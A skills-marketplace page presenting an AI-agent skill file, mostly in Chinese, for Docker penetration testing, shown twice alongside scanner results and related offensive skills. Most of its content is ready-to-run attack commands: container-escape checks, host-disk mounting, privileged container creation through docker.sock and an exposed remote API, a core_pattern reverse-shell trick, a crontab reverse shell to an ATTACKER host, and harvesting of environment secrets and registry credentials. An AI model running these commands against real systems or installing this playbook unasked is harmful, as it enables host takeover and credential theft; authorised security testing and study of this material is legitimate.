Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

wgpsec/docker-pentesting

Name: docker-pentesting
Author: wgpsec

skills/cloud/docker-pentesting/SKILL.md

npx skillsauth add wgpsec/AboutSecurity docker-pentesting

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

Docker 安全测试与容器渗透

Docker 攻击面不只有逃逸：容器配置、Docker Daemon、Registry、镜像层、构建上下文和宿主机共享内核都会形成不同的突破路径。先判断自己处在容器内、宿主机用户态还是远程 Registry/API 视角，再选择逃逸、凭据提取或供应链横向。

深入参考

容器逃逸方法的完整 payload 和利用条件 → 读 references/escape-methods.md
Docker Registry、镜像层和构建产物 Secret 分析 → 读 references/registry-and-image-analysis.md
Docker Build Context 滥用（CI/CD 场景的路径穿越与 Secret 泄露）→ 读 references/escape-methods.md 第 12 节

Phase 1: 攻击面确认

# 确认在容器中
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "IN DOCKER"
ls /.dockerenv 2>/dev/null && echo "IN DOCKER"
cat /proc/1/sched | head -1    # PID 1 不是 systemd/init → 容器

# 基础信息
hostname
cat /etc/os-release
uname -r    # 内核版本（宿主机共享）

Phase 2: 逃逸条件检查清单

按成功率排序检查：

# 1. 特权容器？（最简单的逃逸）
cat /proc/1/status | grep CapEff
# 0000003fffffffff = 特权容器（拥有全部 capabilities）

# 2. Docker Socket 挂载？
ls -la /var/run/docker.sock 2>/dev/null

# 3. procfs 挂载？（core_pattern 逃逸）
# 检查是否一个在 /proc 下、一个在其他挂载路径下
find / -name core_pattern 2>/dev/null

# 4. Docker Remote API 暴露？
# 推测宿主机 IP：优先 hostname -I 取同网段 .1，为空则用 ip route 默认网关
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
timeout 3 bash -c "echo >/dev/tcp/$GW/2375" 2>/dev/null && echo "DOCKER API EXPOSED on $GW:2375"

# 5. 宿主机目录挂载？
mount | grep -v 'overlay\|proc\|sys\|cgroup\|tmpfs\|devpts\|mqueue'
cat /proc/mounts | grep -E '^/dev/'

# 6. Docker 用户组提权？（宿主机场景）
groups | grep docker || id | grep docker
cat /etc/group | grep docker

# 7. 危险 Capabilities？
cat /proc/1/status | grep Cap
# python3 解码: python3 -c "import struct;print(bin(struct.unpack('Q',bytes.fromhex('CAPEFF_HEX'))[0]))"
# 关注: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_OVERRIDE, CAP_NET_ADMIN

# 8. PID namespace 共享？
ls /proc/*/exe 2>/dev/null | head -20
# 能看到大量非容器进程 → hostPID=true

# 9. 网络共享？
ip addr
# 能看到宿主机网卡(eth0 有宿主机 IP) → hostNetwork=true

# 10. 内核版本（判断可利用的 CVE）
uname -r
# 内核版本对照:
# 2.6.22 - 2016.10修复  → DirtyCow (CVE-2016-5195，几乎所有 2016 年前的内核)
# 4.6 - 5.9            → CVE-2020-14386
# >= 5.8 各稳定分支    → DirtyPipe (CVE-2022-0847)
#   修复版本: 5.16.11, 5.15.25, 5.10.102, 5.4.181
# 5.8.0 - 5.16         → CVE-2022-23222 (BPF)
# 2.6.19 - 5.12        → CVE-2021-22555 (Netfilter)
# Ubuntu 14.04-20.10   → OverlayFS (CVE-2021-3493)

# 11. 环境变量泄露？
env | sort
cat /proc/self/environ | tr '\0' '\n'

# 12. docker-compose 配置泄露？
find / -name "docker-compose*" 2>/dev/null

# 13. Registry / 镜像凭据？
cat ~/.docker/config.json 2>/dev/null
find / -path '*/.docker/config.json' 2>/dev/null

Phase 3: Docker 攻击决策树

检查结果？
├─ 特权容器 → 挂载宿主机磁盘 / cgroup release_agent / nsenter（需 hostPID）
├─ Docker Socket → 创建特权容器逃逸（docker CLI 或 curl，详见 references）
├─ procfs 挂载 → core_pattern 管道符反弹 shell
├─ Docker Remote API 暴露 → 远程创建特权容器
├─ 宿主机目录挂载
│   ├─ /etc → 写 crontab/SSH key
│   └─ 其他目录 → 读写宿主机文件
├─ Docker 用户组（宿主机用户在 docker 组）→ docker run -v /:/host
├─ CAP_SYS_ADMIN → cgroup 逃逸 / mount
├─ CAP_SYS_PTRACE + hostPID → 注入宿主机进程
├─ CAP_DAC_READ_SEARCH → shocker / 配合 DirtyPipe
├─ hostNetwork → 访问宿主机服务/Metadata API
├─ 运行时 CVE（runc/containerd 版本过旧）→ CVE-2019-5736, CVE-2019-16884, CVE-2020-15257
├─ Registry 暴露或有镜像凭据 → 枚举仓库/tag/blob，分析镜像层 Secret
├─ 信息收集（不直接逃逸但发现关键信息）
│   ├─ 环境变量 → 可含数据库密码、API Key、云凭证
│   ├─ Docker Registry / 镜像层 → 可含历史 Secret、kubeconfig、源码和制品 Token
│   └─ docker-compose.yml → 可含密码、挂载点、网络配置
└─ 以上都没有 → 内核漏洞（按版本匹配 CVE）
    ├─ >= 5.8 未修复  → DirtyPipe (CVE-2022-0847)
    ├─ 2.6.22+ 2016前 → DirtyCow (CVE-2016-5195)
    ├─ 5.8-5.16       → BPF 绕过 (CVE-2022-23222)
    ├─ 2.6.19-5.12    → Netfilter (CVE-2021-22555)
    └─ Ubuntu 14-20   → OverlayFS (CVE-2021-3493)
详细命令 → [references/escape-methods.md](references/escape-methods.md)

Phase 4: 快速逃逸命令

特权容器（成功率 99%）

mkdir -p /tmp/host && mount /dev/sda1 /tmp/host
cat /tmp/host/root/flag.txt
# 或 chroot /tmp/host bash

Docker Socket（成功率 95%）

# 无 docker CLI 时用 curl（完整流程：查镜像 → 创建 → 启动 → 读日志）
SOCK=/var/run/docker.sock
IMAGE=$(curl -s --unix-socket $SOCK http://localhost/images/json | python3 -c "import json,sys;imgs=json.load(sys.stdin);print(imgs[0]['RepoTags'][0] if imgs else 'alpine')")
CID=$(curl -s --unix-socket $SOCK -X POST -H "Content-Type: application/json" \
  http://localhost/containers/create \
  -d "{\"Image\":\"$IMAGE\",\"Cmd\":[\"cat\",\"/mnt/root/flag.txt\"],\"HostConfig\":{\"Binds\":[\"/:/mnt\"],\"Privileged\":true}}" \
  | python3 -c "import json,sys;print(json.load(sys.stdin)['Id'])")
curl -s --unix-socket $SOCK -X POST http://localhost/containers/$CID/start
sleep 2
curl -s --unix-socket $SOCK "http://localhost/containers/$CID/logs?stdout=true&stderr=true"

procfs 挂载（core_pattern）

# 前提：宿主机 procfs 已挂载到容器中
# 找到容器在宿主机的绝对路径（从 upperdir 取父目录拼 /merged）
upperdir=$(sed -n 's/.*\bupperdir=\([^,]*\).*/\1/p' /proc/mounts)
host_path=$(dirname "$upperdir")/merged
# 写反弹 shell + 覆盖 core_pattern + 触发崩溃
echo -e "|${host_path}/tmp/.t.py \rcore " > /host/proc/sys/kernel/core_pattern

Docker Remote API

# 获取宿主机 IP（优先 hostname -I 推测，为空则用 ip route 网关）
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
docker -H tcp://$GW:2375 run -v /:/mnt -it alpine chroot /mnt bash

写 Crontab 逃逸

# 如果挂载了 /etc 或 /var/spool/cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'" > /host_etc/cron.d/pwn

Docker 用户组提权（宿主机场景）

# 当前用户在 docker 组即可
docker run -v /:/host -it alpine chroot /host sh

工具

| 工具 | 用途 | |------|------| | CDK | 容器逃逸自动化检测+利用 | | deepce | Docker 枚举脚本 | | amicontained | 容器环境检测 |

wgpsec/docker-pentesting

skills/cloud/docker-pentesting/SKILL.md

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

1,345 stars

development

Updated May 22, 2026

$ install --global

skillsauth

npx skillsauth add wgpsec/AboutSecurity docker-pentesting

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: May 22, 2026, 2:17 AM211.6s4 files scanned

SKILL.md

name:: docker-pentesting
description:: Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
tags:: docker,container,registry,image,container escape,逃逸,容器,镜像层,docker.sock,docker api,cgroup,runc,namespace,procfs,core_pattern,capabilities,dirtycow,dirtypipe
category:: cloud
mitre_attack:: T1611,T1610,T1613

Docker 安全测试与容器渗透

深入参考

容器逃逸方法的完整 payload 和利用条件 → 读 references/escape-methods.md
Docker Registry、镜像层和构建产物 Secret 分析 → 读 references/registry-and-image-analysis.md
Docker Build Context 滥用（CI/CD 场景的路径穿越与 Secret 泄露）→ 读 references/escape-methods.md 第 12 节

Phase 1: 攻击面确认

# 确认在容器中
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "IN DOCKER"
ls /.dockerenv 2>/dev/null && echo "IN DOCKER"
cat /proc/1/sched | head -1    # PID 1 不是 systemd/init → 容器

# 基础信息
hostname
cat /etc/os-release
uname -r    # 内核版本（宿主机共享）

Phase 2: 逃逸条件检查清单

按成功率排序检查：

# 1. 特权容器？（最简单的逃逸）
cat /proc/1/status | grep CapEff
# 0000003fffffffff = 特权容器（拥有全部 capabilities）

# 2. Docker Socket 挂载？
ls -la /var/run/docker.sock 2>/dev/null

# 3. procfs 挂载？（core_pattern 逃逸）
# 检查是否一个在 /proc 下、一个在其他挂载路径下
find / -name core_pattern 2>/dev/null

# 4. Docker Remote API 暴露？
# 推测宿主机 IP：优先 hostname -I 取同网段 .1，为空则用 ip route 默认网关
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
timeout 3 bash -c "echo >/dev/tcp/$GW/2375" 2>/dev/null && echo "DOCKER API EXPOSED on $GW:2375"

# 5. 宿主机目录挂载？
mount | grep -v 'overlay\|proc\|sys\|cgroup\|tmpfs\|devpts\|mqueue'
cat /proc/mounts | grep -E '^/dev/'

# 6. Docker 用户组提权？（宿主机场景）
groups | grep docker || id | grep docker
cat /etc/group | grep docker

# 7. 危险 Capabilities？
cat /proc/1/status | grep Cap
# python3 解码: python3 -c "import struct;print(bin(struct.unpack('Q',bytes.fromhex('CAPEFF_HEX'))[0]))"
# 关注: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_OVERRIDE, CAP_NET_ADMIN

# 8. PID namespace 共享？
ls /proc/*/exe 2>/dev/null | head -20
# 能看到大量非容器进程 → hostPID=true

# 9. 网络共享？
ip addr
# 能看到宿主机网卡(eth0 有宿主机 IP) → hostNetwork=true

# 10. 内核版本（判断可利用的 CVE）
uname -r
# 内核版本对照:
# 2.6.22 - 2016.10修复  → DirtyCow (CVE-2016-5195，几乎所有 2016 年前的内核)
# 4.6 - 5.9            → CVE-2020-14386
# >= 5.8 各稳定分支    → DirtyPipe (CVE-2022-0847)
#   修复版本: 5.16.11, 5.15.25, 5.10.102, 5.4.181
# 5.8.0 - 5.16         → CVE-2022-23222 (BPF)
# 2.6.19 - 5.12        → CVE-2021-22555 (Netfilter)
# Ubuntu 14.04-20.10   → OverlayFS (CVE-2021-3493)

# 11. 环境变量泄露？
env | sort
cat /proc/self/environ | tr '\0' '\n'

# 12. docker-compose 配置泄露？
find / -name "docker-compose*" 2>/dev/null

# 13. Registry / 镜像凭据？
cat ~/.docker/config.json 2>/dev/null
find / -path '*/.docker/config.json' 2>/dev/null

Phase 3: Docker 攻击决策树

检查结果？
├─ 特权容器 → 挂载宿主机磁盘 / cgroup release_agent / nsenter（需 hostPID）
├─ Docker Socket → 创建特权容器逃逸（docker CLI 或 curl，详见 references）
├─ procfs 挂载 → core_pattern 管道符反弹 shell
├─ Docker Remote API 暴露 → 远程创建特权容器
├─ 宿主机目录挂载
│   ├─ /etc → 写 crontab/SSH key
│   └─ 其他目录 → 读写宿主机文件
├─ Docker 用户组（宿主机用户在 docker 组）→ docker run -v /:/host
├─ CAP_SYS_ADMIN → cgroup 逃逸 / mount
├─ CAP_SYS_PTRACE + hostPID → 注入宿主机进程
├─ CAP_DAC_READ_SEARCH → shocker / 配合 DirtyPipe
├─ hostNetwork → 访问宿主机服务/Metadata API
├─ 运行时 CVE（runc/containerd 版本过旧）→ CVE-2019-5736, CVE-2019-16884, CVE-2020-15257
├─ Registry 暴露或有镜像凭据 → 枚举仓库/tag/blob，分析镜像层 Secret
├─ 信息收集（不直接逃逸但发现关键信息）
│   ├─ 环境变量 → 可含数据库密码、API Key、云凭证
│   ├─ Docker Registry / 镜像层 → 可含历史 Secret、kubeconfig、源码和制品 Token
│   └─ docker-compose.yml → 可含密码、挂载点、网络配置
└─ 以上都没有 → 内核漏洞（按版本匹配 CVE）
    ├─ >= 5.8 未修复  → DirtyPipe (CVE-2022-0847)
    ├─ 2.6.22+ 2016前 → DirtyCow (CVE-2016-5195)
    ├─ 5.8-5.16       → BPF 绕过 (CVE-2022-23222)
    ├─ 2.6.19-5.12    → Netfilter (CVE-2021-22555)
    └─ Ubuntu 14-20   → OverlayFS (CVE-2021-3493)
详细命令 → [references/escape-methods.md](references/escape-methods.md)

Phase 4: 快速逃逸命令

特权容器（成功率 99%）

mkdir -p /tmp/host && mount /dev/sda1 /tmp/host
cat /tmp/host/root/flag.txt
# 或 chroot /tmp/host bash

Docker Socket（成功率 95%）

# 无 docker CLI 时用 curl（完整流程：查镜像 → 创建 → 启动 → 读日志）
SOCK=/var/run/docker.sock
IMAGE=$(curl -s --unix-socket $SOCK http://localhost/images/json | python3 -c "import json,sys;imgs=json.load(sys.stdin);print(imgs[0]['RepoTags'][0] if imgs else 'alpine')")
CID=$(curl -s --unix-socket $SOCK -X POST -H "Content-Type: application/json" \
  http://localhost/containers/create \
  -d "{\"Image\":\"$IMAGE\",\"Cmd\":[\"cat\",\"/mnt/root/flag.txt\"],\"HostConfig\":{\"Binds\":[\"/:/mnt\"],\"Privileged\":true}}" \
  | python3 -c "import json,sys;print(json.load(sys.stdin)['Id'])")
curl -s --unix-socket $SOCK -X POST http://localhost/containers/$CID/start
sleep 2
curl -s --unix-socket $SOCK "http://localhost/containers/$CID/logs?stdout=true&stderr=true"

procfs 挂载（core_pattern）

# 前提：宿主机 procfs 已挂载到容器中
# 找到容器在宿主机的绝对路径（从 upperdir 取父目录拼 /merged）
upperdir=$(sed -n 's/.*\bupperdir=\([^,]*\).*/\1/p' /proc/mounts)
host_path=$(dirname "$upperdir")/merged
# 写反弹 shell + 覆盖 core_pattern + 触发崩溃
echo -e "|${host_path}/tmp/.t.py \rcore " > /host/proc/sys/kernel/core_pattern

Docker Remote API

# 获取宿主机 IP（优先 hostname -I 推测，为空则用 ip route 网关）
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
docker -H tcp://$GW:2375 run -v /:/mnt -it alpine chroot /mnt bash

写 Crontab 逃逸

# 如果挂载了 /etc 或 /var/spool/cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'" > /host_etc/cron.d/pwn

Docker 用户组提权（宿主机场景）

# 当前用户在 docker 组即可
docker run -v /:/host -it alpine chroot /host sh

工具

| 工具 | 用途 | |------|------| | CDK | 容器逃逸自动化检测+利用 | | deepce | Docker 枚举脚本 | | amicontained | 容器环境检测 |

Related Skills

wgpsec/azure-pentesting

testing

VerifiedTrustedCommunity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

1,393SKILL.mdUpdated Apr 24, 2026

wgpsec/azure-pentesting

wgpsec/mythic-c2

tools

VerifiedTrustedCommunity

Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务，或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断

1,345SKILL.mdUpdated May 22, 2026

wgpsec/padbuster-padding-oracle

development

VerifiedTrustedCommunity

使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文，适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能

1,345SKILL.mdUpdated May 6, 2026

wgpsec/padbuster-padding-oracle

wgpsec/nuclei-scan

tools

VerifiedTrustedCommunity

Nuclei 漏洞扫描工具使用方法论。当需要对目标进行已知漏洞扫描、CVE 验证、批量 PoC 检测时使用。Nuclei 拥有社区维护的 9000+ 模板，覆盖 CVE、默认口令、配置错误、信息泄露等。任何涉及 nuclei 扫描、CVE 批量验证、PoC 检测、漏洞模板搜索的场景都应使用此技能。也适用于需要从 nuclei 模板中提取 payload 用于手动利用的场景

1,345SKILL.mdUpdated May 6, 2026

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/wgpsec/AboutSecurity.git

# Copy into Claude Code skills folder (global)
cp -r AboutSecurity/skills/cloud/docker-pentesting ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

wgpsec/AboutSecurity

1,345 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT